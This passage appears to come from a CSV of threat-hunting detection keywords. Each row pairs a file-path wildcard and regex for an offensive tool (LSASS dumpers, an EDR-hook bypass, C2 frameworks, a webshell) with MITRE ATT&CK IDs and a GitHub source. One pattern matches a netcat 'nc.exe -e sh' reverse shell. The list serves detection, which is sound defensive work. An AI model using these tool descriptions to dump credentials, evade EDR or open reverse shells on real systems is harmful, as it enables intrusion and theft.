Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\MultiDump.sln*",".{0,1000}\\MultiDump\.sln.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\MultiDump.vcxproj*",".{0,1000}\\MultiDump\.vcxproj.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential 
Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\MutationGate.cpp*",".{0,1000}\\MutationGate\.cpp.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*\MutationGate.exe*",".{0,1000}\\MutationGate\.exe.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*\MutationGate.sln*",".{0,1000}\\MutationGate\.sln.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*\MutationGate.vcxproj*",".{0,1000}\\MutationGate\.vcxproj.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*\mystikal.py*",".{0,1000}\\mystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - 
T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*\nanodump*",".{0,1000}\\nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*\nanodump.py*",".{0,1000}\\nanodump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\nanorobeus-main.zip*",".{0,1000}\\nanorobeus\-main\.zip.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\NativeDump.csproj*",".{0,1000}\\NativeDump\.csproj.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\NativeDump.exe*",".{0,1000}\\NativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\NativeDump.sln*",".{0,1000}\\NativeDump\.sln.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\NativeDump\Program.cs*",".{0,1000}\\NativeDump\\Program\.cs.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\nbnsspoof.py*",".{0,1000}\\nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\nbtscan.py*",".{0,1000}\\nbtscan\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nc.exe * -e sh*",".{0,1000}\\nc\.exe\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\nc_srv.bat",".{0,1000}\\nc_srv\.bat","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\net*\ftpagent.exe*",".{0,1000}\\net.{0,1000}\\ftpagent\.exe.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for 
Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*\net_4.0_32_RunasCs.exe*",".{0,1000}\\net_4\.0_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_32SharpDoor.exe*",".{0,1000}\\net_4\.0_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_32sharpfiles.exe*",".{0,1000}\\net_4\.0_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_64_RunasCs.exe*",".{0,1000}\\net_4\.0_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_64SharpDoor.exe*",".{0,1000}\\net_4\.0_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_64sharpfiles.exe*",".{0,1000}\\net_4\.0_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_Any_RunasCs.exe*",".{0,1000}\\net_4\.0_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_AnySharpDoor.exe*",".{0,1000}\\net_4\.0_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_Anysharpfiles.exe*",".{0,1000}\\net_4\.0_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_32_RunasCs.exe*",".{0,1000}\\net_4\.5_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_32SharpDoor.exe*",".{0,1000}\\net_4\.5_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_32sharpfiles.exe*",".{0,1000}\\net_4\.5_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_64_RunasCs.exe*",".{0,1000}\\net_4\.5_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_64SharpDoor.exe*",".{0,1000}\\net_4\.5_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_64sharpfiles.exe*",".{0,1000}\\net_4\.5_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_Any_RunasCs.exe*",".{0,1000}\\net_4\.5_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_AnySharpDoor.exe*",".{0,1000}\\net_4\.5_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.5_Anysharpfiles.exe*",".{0,1000}\\net_4\.5_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.7_32_RunasCs.exe*",".{0,1000}\\net_4\.7_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.7_64_RunasCs.exe*",".{0,1000}\\net_4\.7_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.7_Any_RunasCs.exe*",".{0,1000}\\net_4\.7_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_portscan.py*",".{0,1000}\\net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\NETAMSI.ps1*",".{0,1000}\\NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\NetClone.exe*",".{0,1000}\\NetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\NetClone\Program.cs*",".{0,1000}\\NetClone\\Program\.cs.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\netcreds.py*",".{0,1000}\\netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\netexec.py*",".{0,1000}\\netexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\netexec.yml*",".{0,1000}\\netexec\.yml.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NetExec-main*",".{0,1000}\\NetExec\-main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - 
